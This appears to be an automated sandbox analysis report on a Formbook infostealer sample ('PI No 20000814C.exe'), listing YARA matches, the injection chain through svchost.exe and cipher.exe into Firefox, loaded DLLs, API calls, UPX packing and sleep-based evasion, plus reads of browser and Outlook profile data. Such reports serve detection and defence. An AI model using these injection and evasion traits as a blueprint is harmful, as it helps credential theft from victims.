            Source: PI No 20000814C.exe, 00000000.00000003.2071812647.00000000042B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI No 20000814C.exe
            Source: PI No 20000814C.exe, 00000000.00000003.2068613058.000000000440D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI No 20000814C.exe
            Source: PI No 20000814C.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/13
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6A2D5 GetLastError,FormatMessageW,0_2_00F6A2D5
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F58713 AdjustTokenPrivileges,CloseHandle,0_2_00F58713
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F58CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F58CC3
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F6B59E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F7F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F7F121
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F04FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F04FE9
            Source: C:\Users\user\Desktop\PI No 20000814C.exeFile created: C:\Users\user\AppData\Local\Temp\aut81DC.tmpJump to behavior
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003671000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2413736720.0000000003646000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4520210070.0000000003695000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2413833307.0000000003667000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4520210070.0000000003667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PI No 20000814C.exeVirustotal: Detection: 41%
            Source: PI No 20000814C.exeReversingLabs: Detection: 39%
            Source: unknownProcess created: C:\Users\user\Desktop\PI No 20000814C.exe "C:\Users\user\Desktop\PI No 20000814C.exe"
            Source: C:\Users\user\Desktop\PI No 20000814C.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe"
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeProcess created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe"
            Source: C:\Windows\SysWOW64\cipher.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PI No 20000814C.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeProcess created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: efsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: feclient.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4522417554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4520103554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: cipher.pdbGCTL source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: cipher.pdb source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_0102B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0102B090
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F28B85 push ecx; ret 0_2_00F28B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0048A060 push ecx; iretd 2_2_0048A076
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047A826 push ebx; ret 2_2_0047A82C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047503B push ebp; ret 2_2_0047503C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004770A9 push esi; ret 2_2_004770AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004731E0 push eax; ret 2_2_004731E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00486196 push eax; retf 2_2_00486198
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00474C31 push edx; retf 2_2_00474C3A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004814EC push ebp; ret 2_2_004814F5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047CCBA push es; iretd 2_2_0047CCBB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00482E43 push esi; retf 2_2_00482E4E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047CF10 push ecx; iretd 2_2_0047CF11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047A7CC push ebx; ret 2_2_0047A82C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0283D push eax; iretd 2_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx2_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F01368 push eax; iretd 2_2_02F01369
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053327FA pushad ; ret 4_2_053327F9
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0533225F pushad ; ret 4_2_053327F9
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053609AD push ecx; mov dword ptr [esp], ecx4_2_053609B6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0533283D push eax; iretd 4_2_05332858
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0533135D push eax; iretd 4_2_05331369
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BE309 push ebp; ret 4_2_032BE312
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032D02A2 push eax; ret 4_2_032D02A3
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C2FB3 push eax; retf 4_2_032C2FB5
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C6E7D push ecx; iretd 4_2_032C6E93
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032B7643 push ebx; ret 4_2_032B7649
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032B75E9 push ebx; ret 4_2_032B7649
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032B1A4E push edx; retf 4_2_032B1A57
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032B1E58 push ebp; ret 4_2_032B1E59
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F04A35
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F855FD
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F233C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F233C7
            Source: C:\Users\user\Desktop\PI No 20000814C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\cipher.exeWindow / User API: threadDelayed 1772Jump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeWindow / User API: threadDelayed 8201Jump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99512
            Source: C:\Users\user\Desktop\PI No 20000814C.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\cipher.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836Thread sleep count: 1772 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836Thread sleep time: -3544000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836Thread sleep count: 8201 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cipher.exe TID: 5836Thread sleep time: -16402000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cipher.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F64696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F64696
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F6C9C7
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6C93C FindFirstFileW,FindClose,0_2_00F6C93C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F6F200
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F6F35D
